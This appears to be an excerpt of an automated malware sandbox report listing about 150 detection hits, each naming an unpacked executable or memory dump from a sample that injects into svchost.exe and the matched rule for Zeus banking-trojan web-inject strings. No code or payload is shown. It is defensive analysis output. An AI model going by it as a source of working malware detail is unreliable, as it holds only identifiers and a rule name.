Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nPtwtzGyOdAtB.exe.2d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nPtwtzGyOdAtB.exe.1012000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.20.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.nPtwtzGyOdAtB.exe.2a52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.nPtwtzGyOdAtB.exe.29f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nPtwtzGyOdAtB.exe.2d80000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nPtwtzGyOdAtB.exe.1202000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.47.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 15.2.nPtwtzGyOdAtB.exe.2e20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.ed00000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.11.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.49.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.45.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.nPtwtzGyOdAtB.exe.1380000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 32.2.nPtwtzGyOdAtB.exe.2840000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.50.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.51.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nPtwtzGyOdAtB.exe.1410000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.46.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.14.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2cd1c00.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 32.2.nPtwtzGyOdAtB.exe.2840000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.26.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.nPtwtzGyOdAtB.exe.2cf0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.nPtwtzGyOdAtB.exe.3160000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.52.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29f3c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.43.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 20.2.nPtwtzGyOdAtB.exe.13a2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29f3c00.3.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.44.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.48.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nPtwtzGyOdAtB.exe.1012000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.43.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 10.2.nPtwtzGyOdAtB.exe.3210000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.nPtwtzGyOdAtB.exe.f70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.8.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.nPtwtzGyOdAtB.exe.f12000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29a2000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nPtwtzGyOdAtB.exe.2ab2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.5830000.17.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.nPtwtzGyOdAtB.exe.2a52000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 10.2.nPtwtzGyOdAtB.exe.3072000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.nPtwtzGyOdAtB.exe.2c02000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 15.2.nPtwtzGyOdAtB.exe.2e20000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.41.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.WlCVLbzNph.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.nPtwtzGyOdAtB.exe.2ab2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.nPtwtzGyOdAtB.exe.1322000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.nPtwtzGyOdAtB.exe.1410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 10.2.nPtwtzGyOdAtB.exe.3072000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.ed00000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.15.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.4200000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.WlCVLbzNph.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c70000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2cd1c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.nPtwtzGyOdAtB.exe.f70000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f340000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.42.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.nPtwtzGyOdAtB.exe.2f62000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.nPtwtzGyOdAtB.exe.2cd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.9.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 15.2.nPtwtzGyOdAtB.exe.2b52000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.nPtwtzGyOdAtB.exe.2c02000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29a2000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.22.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.52.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.WlCVLbzNph.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.48.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.51.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 32.2.nPtwtzGyOdAtB.exe.26b2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c70000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.4200000.7.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.WlCVLbzNph.exe.5c32a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.50.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.45.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 35.2.nPtwtzGyOdAtB.exe.f12000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.32.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.WlCVLbzNph.exe.5c8ea8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.nPtwtzGyOdAtB.exe.2cd0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2a50000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.49.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.nPtwtzGyOdAtB.exe.29f0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2a50000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 10.2.nPtwtzGyOdAtB.exe.3210000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.21.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 20.2.nPtwtzGyOdAtB.exe.1400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 20.2.nPtwtzGyOdAtB.exe.1400000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.nPtwtzGyOdAtB.exe.1322000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f280000.25.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.WlCVLbzNph.exe.406400.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f340000.10.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.nPtwtzGyOdAtB.exe.2a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.1915085532.0000000001010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1991774796.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000014.00000002.1898425199.0000000001400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1985170745.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1980433347.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1985005669.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1964558264.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2692265840.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1869468125.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1995640935.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1948235173.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1964024407.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000F.00000002.1873568549.0000000002B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1980207397.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
